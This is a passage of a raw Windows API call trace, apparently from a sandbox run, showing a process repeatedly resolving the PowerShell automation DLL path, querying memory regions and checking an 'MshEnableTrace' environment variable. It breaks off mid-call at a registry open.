lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.514] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0086.516] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.516] CoTaskMemFree (pv=0x1f7410) [0086.518] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0086.539] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.539] CoTaskMemFree (pv=0x1f7410) [0086.540] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.540] CoTaskMemFree (pv=0x1f7410) [0086.540] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.540] CoTaskMemFree (pv=0x1f7410) [0086.543] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.543] CoTaskMemFree (pv=0x1f7410) [0086.547] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.547] CoTaskMemFree (pv=0x1f7410) [0086.547] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.547] CoTaskMemFree (pv=0x1f7410) [0086.551] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0086.552] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0086.736] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0086.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.953] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f7850 [0086.954] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f7960 [0087.138] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.250] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.253] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.254] VirtualQuery (in: lpAddress=0xea240, lpBuffer=0xeb100, dwLength=0x30 | out: lpBuffer=0xeb100*(BaseAddress=0xea000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.301] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.301] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.301] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.302] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.303] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.304] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.304] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.304] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.304] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.304] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.311] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.349] VirtualQuery (in: lpAddress=0xebaa0, lpBuffer=0xec960, dwLength=0x30 | out: lpBuffer=0xec960*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.355] VirtualQuery (in: lpAddress=0xebaa0, lpBuffer=0xec960, dwLength=0x30 | out: lpBuffer=0xec960*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.355] VirtualQuery (in: lpAddress=0xeb2f0, lpBuffer=0xec1b0, dwLength=0x30 | out: lpBuffer=0xec1b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.355] VirtualQuery (in: lpAddress=0xeb2f0, lpBuffer=0xec1b0, dwLength=0x30 | out: lpBuffer=0xec1b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, 